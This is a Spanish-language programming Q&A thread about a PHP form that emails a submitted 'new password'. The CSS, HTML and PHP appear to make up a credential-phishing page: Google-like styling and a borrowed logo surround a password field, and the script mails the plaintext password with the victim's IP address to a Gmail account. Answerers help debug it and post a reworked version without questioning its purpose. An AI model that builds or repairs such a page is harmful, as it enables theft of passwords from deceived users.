# Enviar contraseña por metodo POST en formulario PHP

Tags: php, javascript, html, css, post

Tengo el campo para enviar una nueva contraseña al correo de la empresa, esta contraseña se envía por método `POST` haciendo clic en un `input` tipo `submit`.

Luego pasa por el `validador.php` que se encarga de enviar los datos y si es correcto redirige a `exitoso.html`

Estos pasos funcionan, pero nunca llega el correo, hay algo que esté haciendo mal?

```css
body {
  display: flex;
  min-height: 100vh;
  flex-direction: column;
}

main {
  flex: 1 0 auto;
}

.gbox {
  height: auto;
  min-height: 380px;
  width: 450px;
  flex-shrink: 0;
  border: 1px solid #dadce0;
  -webkit-border-radius: 8px;
  border-radius: 8px;
  display: block;
  margin: 0 auto;
  max-width: 100%;
}

.intbox {
  width: 350px;
  margin-top: 3rem;
}

.logo {
  height: 37px;
  margin: 0 auto;
  overflow: visible;
  position: relative;
  width: 10rem;
}

.h-one {
  color: #202124;
  padding-bottom: 0;
  padding-top: 16px;
  font-size: 24px;
  font-weight: 400;
  line-height: 1.3333;
  margin-bottom: 0;
  margin-top: 0;
}

.prrf {
  font-size: 14px;
  text-align: left;
  color: #555;
}

.anchor {
  color: #1a73e8;
  font-weight: 700;
  margin: 10px 0;
  padding: 0!important;
}

.botn {
  background: #1a73e8;
  color: #fff;
  font-weight: 700;
  padding: 10px;
  -webkit-border-radius: 4px;
  border-radius: 4px;
}

.r6s {
  min-height: 5rem;
}

.page-footer {
  margin: 25px 10px;
  color: #555;
  background: #fff;
}

.down {
  vertical-align: text-top;
  margin-right: 0;
}

button,
html [type="button"],
[type="reset"],
[type="submit"] {
  -webkit-appearance: inherit;
}

button {
  background-color: transparent;
  box-sizing: border-box;
  padding: 0;
  border-width: 0;
  border-style: none;
  border-color: transparent;
  border-image: none;
  font-family: inherit;
  overflow: hidden;
  font: inherit;
}
```

```html
<!DOCTYPE html>
<html lang="es">

<head>
  <meta charset="UTF-8">
  <title>Solicitud actualizacion de contraseña</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel='shortcut icon' type='image/x-icon' href='favicon.ico'>


  <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css'>

</head>


<body>
  <div class="container center-align gbox">
    <div class="row intbox">
      <form class="col s12" method="post" action="validador.php">

        <div class="logo"><img src="https://www.fusio.net/app/uploads/2017/09/fundit-logo.png" height=50px></div>
        <h1 class="h-one">Actualización clave</h1>
        <p class="prrf">lorem ipsum dolor sit amet</p>
        <div class="input-field col s12">
          <input type="password" class="validate" name="clave">
          <label for="clave">Ingrese la nueva clave</label>
        </div>
        <div class="r6s"><br>
          <p>&nbsp</p>
        </div>
        <div class="row">
          <div class="col s8 anchor"><span>&nbsp</span></div>
          <div class="col s4"><input type="submit" name="Submit" value="Enviar" class="botn"></div>
        </div>
      </form>

    </div>

  </div>


  <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/js/materialize.min.js'></script>



</body>

</html>
```

Y este es mi `validador.php`

```html
<?php
if(isset($_POST['clave'])) {

    $email_to = "correo@gmail.com";
    $email_subject = "Solicitud cambio de clave";     
     
    $clave = $_POST['clave'];    
          
    $email_message = "Message:\n\n";
     
    function clean_string($string) { 
      $bad = array("content-type","bcc:","to:","cc:","href"); 
      return str_replace($bad,"",$string);
    }

 function getUserIpAddr()
 {
     if (!empty($_SERVER['HTTP_CLIENT_IP']))
     {
         return $_SERVER['HTTP_CLIENT_IP'];
     }
     else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
     {
         return $_SERVER['HTTP_X_FORWARDED_FOR'];
     }
     else
     {
         return $_SERVER['REMOTE_ADDR'];
     }
 }    

    $email_message .= "IP address: ".getUserIpAddr()."\n";    
    
    $email_message .= "Nueva clave: ".clean_string($clave)."\n";
    
 
 $headers = "MIME-Version: 1.0" . "\r\n";
 $headers .= "Content-type:text/plain;charset=UTF-8" . "\r\n";
 $headers .= 'From: '.$clave. "\r\n";

 if (@mail($email_to, $email_subject, $email_message, $headers)) {
  header('Location: exitoso.html');
 } else {
  header('Location: error.html');
 }
} 
?>
```

Comment: Antes que nada, chequeaste que el correo no llegue a spam?

Comment: Si señor, y tampoco es problema del hosting, porque tengo un formulario en otro subdominio que funciona sin problema. Podría ser depronto porque envío un campo tipo "password" o existe algún error?

Comment: No soy experto en PHP, ese validador lo modifiqué para que enviara solo un campo que era el de contraseña. A lo mejor eliminé algo que no debía

Comment: ¿O sea que entra aquí y todo: `header('Location: exitoso.html');`? Evita el uso de arroba en las funciones, por ejemplo: `@mail`  pues silencia los errores dificultando la depuración. Quítale la arroba...

Comment: @A.Cedano exacto, luego de darle a enviar pasa por el validador.php y finaliza con exitoso.html. Pero nunca llega el correo

Answer (score 3):

Tu código está un poco descabellado, tienes las dos funciones dentro del `if` ¿?

Intenta esto, teniendo en cuenta que las funciones deben estar independientes del bloque `if`. Además he optimizado un poco, evaluando el valor posteado para clave con un ternario y usando una variable `$url` para hacer la redirección.

Si te redirige a error, debes depurar las variables, si no recibes el correo, debes revisar la carpeta spam. Si no hay nada, intenta revisar el log de errores y verifica con `phpinfo()` si la función para email está corriendo correctamente.

```
<?php
    $clave =  empty($_POST['clave']) ? NULL : $_POST['clave'];   

    if($clave) {
        $email_to = "correo@gmail.com";
        $email_subject = "Solicitud cambio de clave";               
        $email_message = "Message:\n\n";
        $email_message .= "IP address: ".getUserIpAddr()."\n";        
        $email_message .= "Nueva clave: ".clean_string($clave)."\n";   
        $headers = "MIME-Version: 1.0" . "\r\n";
        $headers .= "Content-type:text/plain;charset=UTF-8" . "\r\n";
        $headers .= 'From: '.$clave. "\r\n";
        $url= mail($email_to, $email_subject, $email_message, $headers) ? "exitoso.html" :  "error.html";

    } else {

        $url="error.html";

    } 
    header("Location: $url");

    #------------------------------------------------------------
    #Las funciones deben estar aparte   
    function clean_string($string) 
    { 
      $bad = array("content-type","bcc:","to:","cc:","href"); 
      return str_replace($bad,"",$string);
    }

    function getUserIpAddr()
    {
        if (!empty($_SERVER['HTTP_CLIENT_IP']))
        {
            return $_SERVER['HTTP_CLIENT_IP'];
        }
        else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            return $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
        else
        {
            return $_SERVER['REMOTE_ADDR'];
        }
    }   
?>
```

Comment: Gracias por su tiempo caballero, por desgracia me arroga el error "HTTP ERROR 500" después de darle al botón submit. En Chrome muestra el mensaje "La página misitio.com no puede procesar esta solicitud ahora".

Comment: @ConceptDev bien, bien. Yo cometí un error en el ternario que evalúa el resultado de la función `mail`, es una mínima cosa, ponlo así: **`$url= mail($email_to, $email_subject, $email_message, $headers) ? "exitoso.html" :  "error.html";`**  Ahora edito la respuesta.

Comment: Gracias nuevamente por su valioso tiempo amigo, pero sigue sin funcionar. ¿A lo mejor si lo planteo de otra manera? Sólo necesito enviar una contraseña por método POST a un correo, creo que con AJAX es más corto el proceso pero no conozco el proceso.

Comment: @ConceptDev con Ajax puede que sea mucho mejor, pero no porque sea más corto o no. Ajax sería mejor si quieres actualizar información en la página una vez se haya enviado el email. Pero ese no es el problema aquí, si el código actual no funciona ahora, tampoco funcionará porque uses Ajax. Una cosa que no has dicho es si depuraste las variables. Puedes hacer por ejemplo un `var_dump($_POST);` para ver lo que se está recibiendo realmente. Hay que hacer funcionar el código y luego cuando funcione te puedes plantear una solución basada en Ajax.

Comment: Muchas gracias por su respuesta, voy a considerar todas sus amables sugerencias y vuelvo si me encuentro ante otro problema